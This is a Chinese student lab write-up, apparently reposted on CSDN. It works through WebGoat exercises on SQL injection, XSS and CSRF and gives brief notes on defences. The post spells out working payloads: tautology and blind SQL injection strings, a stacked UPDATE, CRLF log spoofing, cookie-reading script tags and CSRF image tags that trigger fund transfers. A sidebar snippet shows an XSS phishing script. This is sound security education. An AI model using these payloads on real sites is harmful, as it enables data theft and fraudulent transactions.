20145308 《网络对抗》Web安全基础实践 学习总结

最新推荐文章于 2023-09-18 20:05:55 发布
最新推荐文章于 2023-09-18 20:05:55 发布
阅读量110 收藏
点赞数
原文链接:http://www.cnblogs.com/yg961022/p/6852075.html
版权

20145308 《网络对抗》 Web安全基础实践 学习总结

实验内容

  • 本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。

    基础问题回答

  • (1)SQL注入攻击原理,如何防御
  • 通过在文本框中输入的字符串与web中事先定义好的SQL语句结合,构成注入攻击的SQL实现攻击
  • 主要还是通过编程时多多实现对输入字符串的合法性检验
  • (2)XSS攻击的原理,如何防御
  • 通过对网页注入可执行代码,实现攻击
  • 通过网页编程实现对输入内容的过滤
  • (3)CSRF攻击原理,如何防御
  • 跨站请求伪造,通过伪装受信任用户的请求利用受信任网站,利用用户在可信网站上没有登出的COOKIE做恶意操作

  • 经常删除保存的COOKIE

    实验总结与体会

  • 这次实验在WebGoat里做了SQL注入的10个相关实践,从上周学习的简单通过文本框中输入字符串构造SQL语句进行SQL注入到在文本框中提交文本或者发送邮件做XSS攻击,还有利用;邮件发送含有恶意URL请求的HTML对象来利用用户的COOKIE做非法操作

    实践过程记录

  • 开启webgoat
    884673-20170514115257379-1048926892.png

884673-20170514115259957-1346560036.png

  • 最小化启动页面
  • 浏览器访问WebGoat
    884673-20170514115326972-1432959662.png

SQL注入

Numeric SQL Injection
  • 构造SQL语句,显示出数据库中不应该显示的信息
  • 首先开启BurpSuite
  • 设置代理,添加8888端口
  • BurSuite捕获到数据包

  • 修改station值,让SQL语句变为SELECT * FROM weather_data WHERE station = 101 or 1=1
    884673-20170514115700566-1922714074.png

  • 点击GO,修改成功
    884673-20170514115654863-950449338.png

  • 一激动,成功了忘截图,只剩一个小钩钩了
    884673-20170514115650301-570184471.png

  • 关闭BurSuite并设置浏览器不使用代理

    Log Spoofing
  • 构造字符串,用显示的登录信息欺骗登陆的用户,以为自己的登陆成功
  • 在登陆界面的用户名处输入%0d%0aLogin Succeeded! admain

  • 显示的其实还是登录失败的信息,只不过在视觉上欺骗了用户
    884673-20170514115642879-1944417020.png

String SQL Injection
  • 通过构造SQL语句显示数据库中所有信用卡的信息
  • 修改语句构造SELECT * FROM user_data WHERE last_name = '' or 1=1;--'显示全部信息
    884673-20170514115637472-1346205481.png
DataBase Backdoors stage1
  • 输入101 or 1=1;update employee set salary=3;构造SQL语句,创建了salary字段
    884673-20170514115624832-1682293642.png
DataBase Backdoors stage2
  • 通过题目给的SQL语句注入,实现创建一个后门,一旦添加一个新用户,就将新用户的邮箱修改为john@hackme.com
    884673-20170514115614551-1212656087.png
Blind Numeric SQL Injection
  • 通过SQL注入,在pins表中找到cc_number值为1111222233334444的pin值为多少
  • 输入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444')>500);尝试大于500,成功;小于1000,失败;所以应该大于1000,一直用二分法尝试
    884673-20170514115559051-1530537427.png

884673-20170514115553566-2092097677.png

  • 最后逼近到2364,猜测为2364,成功
    884673-20170514115546926-1765557907.png

  • 输入2364
    884673-20170514115534488-1844031439.png

Blind String SQL Injection
  • 原理基本上和Blind Numberic SQL Injection相同,这次是查询登录名是什么,也是构造能够查询登录名的SQL语句,一点点猜
  • 构造SQL字符串101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'),1,1)<'M');查询第一个字母是否小于M,成功;查询小于B,失败
    884673-20170514115524004-1121840146.png

884673-20170514115517972-113740897.png

  • 依次尝试,最后试出来是Jill
    884673-20170514115513363-7188263.png

XSS攻击

Reflected XSS Attacks
  • 通过在文本框中输入,注入JS代码<script>alert(document.cookie);</script>,获得cookies
    884673-20170514115504691-835660275.png
Stored XSS Attacks
  • 通过网站文本框输入,注入js代码,尝试盗走用户cookies
  • 输入一段JS代码<script>alert(document.cookie);</script>提交
  • 点击提交的文本
    884673-20170514115455722-268452453.png

CSRF 攻击

Cross SSite Request Foregery(CSRF)
  • 在文本框中提交一个有URL恶意请求的代码,<img src='attack?Screen=278&menu=900&transFunds=100000' width='1', height='1'>,其中scr=278,menu=900,点击就会执行
    884673-20170514115445441-1070559336.png
CSRF Prompt By-Pass
  • 与上个实验类似,除了转账金额还增加了确认转账,同样构造两个包含恶意URL的图片,此次scr=268,增加<img src='attack?Screen=268&menu=900&transFunds=CONFIRM' width='1', height='1'>提交后点击
    884673-20170514115439316-1271152822.png

成功列表

884673-20170514115432816-121009992.png

884673-20170514115428160-1239717841.png

转载于:https://www.cnblogs.com/yg961022/p/6852075.html

weixin_30731287
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
美国 网络基础设施安全指南 2022年3月
04-14
美国国家安全网络安全技术报告,《网络基础设施安全指南》2022年3月发布,随着新的漏洞被对手利用,新的安全特性被实施,以及保护设备的新方法被识别,保护网络的指导方针继续发展。不正确的配置、不正确的配置...
20145305 《网络对抗Web安全基础实践
weixin_30687587的博客
05-15 86
实践过程及结果截图 Phishing with XSS 在文本框里面写一个钓鱼网站代码就可以了 </form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + docum...
20145234黄斐《网络对抗技术》实验九、Web安全基础实践
weixin_34205076的博客
05-17 125
PS:我是分了两次做的这次试验,第二次实验的时候电脑出了一点问题熄火了……原本后面的是有图的结果博客没保存图没了…… WebGoat WebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些漏洞并非程序中的bug,而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境,为用户完成课程提供了有关的线索。 因为WebGoat是基于j...
webgoat 中 Blind String SQL Injection 的 Python 编程解决
dengzhaoqun的专栏
03-08 1622
这个 task 如果用手工尝试的话, 还是比较麻烦的. 决定用编程解决. Python处理任务相关的问题比较方便, 花时间入门了下 python, 然后开始写代码, 很简单的原理.  在这期间发现简单的算法都不熟了, 汗. 以下是代码#!/usr/bin/python #author: dengzhaoqun #date: 2013-03-08 #email: dengzhaoqun@163
20145312 《网络对抗Web安全基础实践
acn19249的博客
05-21 145
20145312 《网络对抗Web安全基础实践 问题回答 SQL注入攻击原理,如何防御 原理:攻击者在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,把SQL语句当做用户名等输入正常网页中以获取数据库信息的攻击或对数据库增删查改的基本操作。 防御:限制SQL字符串连接的配置文件;指定错误返回页面;替换或删除单引号;去除代码中的敏感信息;封装数据信息等。 XSS攻击...
web安全基础学习相关笔记
weixin_62623950的博客
09-18 170
1.看字母大小写,windows对大小写不敏感,Linux敏感2.看ping值 --ttl在64左右linux ,--ttl在128左右windows3.nmap -O ip #“O”是字母(哪个比例高就是哪个)
20155308《网络对抗》Exp9 Web安全基础实践
WFS12300的博客
05-23 239
20155308《网络对抗》Exp9 Web安全基础实践实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。 基础问题回答 SQL注入攻击原理,如何防御? 原理:攻击者把SQL命令插入到网页的各种查询字符串处,达到欺骗服务器执行恶意的SQL命令。 防御:在网页设计时对文本框的输入进行限制,比如说长度限制、不能出现#号等 2.XSS攻击的原理,如何防御?...
20145325张梓靖 《网络对抗技术》 Web安全基础实践
weixin_30808693的博客
05-08 127
20145325张梓靖 《网络对抗技术》 Web安全基础实践    实验内容 使用webgoat进行XSS攻击、CSRF攻击、SQL注入 XSS攻击:Stored XSS Attacks、Reflected XSS Attacks CSRF攻击:Cross SSite Request Forgery(CSRF)、CSRF Prompt By-Pass SQL注入攻击:Numeric SQL In...
20155330 《网络对抗》 Exp9 web安全基础实践
weixin_30699463的博客
05-29 117
20155330 《网络对抗》 Exp9 web安全基础实践 实验问题回答 SQL注入攻击原理,如何防御 原理:SQL注入攻击值得是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一下组合,通过执行SQL语句进执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 防御方法: 采用sql语句预编译和绑定变量 采用字符串拼接的方式...
20155204《网络对抗》Exp9 Web安全基础实践
weixin_30840253的博客
05-29 138
20155204《网络对抗》Exp9 Web安全基础实践 一、基础问题回答 SQL注入攻击原理,如何防御? 原理: SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 防御: 1.普通用户与系统管理员用户的权限要有严格的区分。...
场景,网络安全实践教育的基础.pdf
08-08
从女儿的英语课外班说起-场景式教育方法 实践教育的目标是培养什么样的人才? 网络安全的特点是什么? 网络安全教育面临哪些挑战? 场景-是提升实践应用能力...场景支撑网络安全实践教育形成闭环 不忘初心,继续前行
面向业务守护的移动安全对抗实践.pdf
01-07
【面向业务守护的移动安全对抗实践】 移动安全领域面临着诸多挑战,特别是在业务守护方面,尤其在游戏平台和移动应用广告安全领域。朱远鹏在2022年看雪安全开发者峰会上分享了针对这些问题的实战经验。 1. **游戏...
机器学习生成对抗网络(附代码)
04-29
机器学习生成对抗网络 机器学习生成对抗网络是一种深度学习算法,通过生成模型和判别模型之间的博弈过程来生成真实样本数据。下面是对机器学习生成对抗网络的详细知识点: GAN 简介 GAN(Generative Adversarial ...
融合对抗主动学习网络安全知识三元组抽取.docx
05-31
总的来说,融合对抗主动学习网络安全知识三元组抽取旨在克服传统方法的局限,通过结合主动学习策略和可能的对抗学习机制,提高在有限标注数据条件下的抽取准确性和效率。这种技术有望为网络安全防御提供更强大的...
matlab下载.pdf
07-14
matlab下载下载方式及注意事项
Android系统原理及开发要点详解-从入门到精通
07-13
Android系统原理及开发要点详解 Java4 Android视频教程 Android开发视频教学 从入门到精通 Android的软件管理器的开发教程视频 Android深入浅出_Android高端课程分享试听 JavaWeb Android系统的手机防盗软件的实现 Android开发入门与实战随书视频 视频列表.txt 0.0MB 开发入门与实战代码.rar 6.1MB 第9章 我来“广播”你的“意图”——Intent和Broadcast面对面.wmv 15.1MB 第8章 移动信息仓库——Android的数据存储操作之轻轻地我保护——SharedPreferences存储-2.wmv 0.6MB 第8章 移动信息仓库——Android的数据存储操作之轻轻地我保护——SharedPreferences存储-1.wmv 24.3MB 第8章 移动信息仓库——Android的数据存储操作之Android数据存储概述.wmv 57.7MB 第7章 良好的学习开端——Android基本组件介绍之友好地互动交流——对话框(Dialog)介绍与实例-2.wmv 7.
GESP等级认证 2024年6月 C++一级真题
最新发布
07-14
GESP等级认证 2024年6月 C++一级真题 从官网上刚刚下载下来的,题都是热乎的,这可是最新真题 大家看一看瞧一瞧,走过路过不要错过,免费下载,全篇无水印,不好用随便吐槽我! 涵盖选择题,判断题,编程题,基础知识多,满满的干货,非常建议下载!!!!! 萌新小白来做做题,复习巩固都很合适!
大学生创业计划书(35)三份资料.doc
07-14
大学生创业计划书(35)三份资料.doc
Web安全学习笔记-lyle
04-27
- 安全开发:将安全实践融入软件开发生命周期。 - 安全建设:整体网络安全架构和策略的实施。 这份笔记是Web安全学习的重要参考资料,适合初学者和经验丰富的专业人士,涵盖了从基础知识到实战技能的全面内容。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值